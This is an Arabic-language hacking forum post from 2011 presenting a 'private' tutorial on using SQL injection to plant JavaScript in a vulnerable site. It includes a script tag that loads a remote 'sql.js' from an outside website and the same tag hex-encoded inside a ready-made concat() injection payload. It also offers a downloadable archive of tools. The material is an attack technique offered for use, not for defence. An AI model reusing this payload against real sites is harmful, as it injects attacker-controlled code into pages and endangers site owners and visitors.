الموضوع: Priv8 ~ SQL injection with javascript
عرض مشاركة واحدة
قديم 05-28-2011, 12:06 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي Priv8 ~ SQL injection with javascript

Priv8 ~ SQL injection with JaVaScript

بسم الله الرحمن الرحيم

راح نستفيد بهاد الدرس من مبدا تشغيل ال جافا سكربت بثغرات sql
بنضع بالعمود المصاب كود جافا سكربت لو اشتغل ببقى شغال عنا الجافا بالعمود هاد
وغالبا يكون شغال الا اذا الحقن من نوع txt

(الي ناسي هاد الكلام يراجع للدوره)

الان عنا سكربت من الاخر اشي فاخر (بالمرفقات للاصدار الاول والاخير )

بلزم ترفعه ع موقع عشان تلعب لعبتك انا بالشرح رفعته هنا

اقتباس
http://www.emmanuelbiblechapel.org/sql.js

اقتباس
<script src="link"></script>

وبعد شفرته من هذا الموقع

كود PHP:
http://www.string-functions.com/string-hex.aspx 
وثم تم التشفير وهذا هو .......

كود PHP:
concat((0x3c736372697074207372633d27687474703a2f2f7777772e656d6d616e75656c6269626c6563686170656c2e6f72672f73716c2e6a73273e3c2f7363726970743e))volcano 

والان رابط الشرح



طبعا الشرح والتولز برايفت ياريت الي بنقلها يذكر الحقوق (اول مره تشرح للعرب )
وهي مصدر الي لطشناه منها من الاجانب عشان ما حد يقول بخلنا عليكم بشيء
http://ponymagic.diosdelared.com/

وشكرا

موفقين


Priv8 Z SQL injection with javascript

الملفات المرفقة
نوع الملف: rar sql.rar‏ (124.4 كيلوبايت, المشاهدات 533)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

التعديل الأخير تم بواسطة KaLa$nikoV ; 05-28-2011 الساعة 03:23 PM.

   

رد مع اقتباس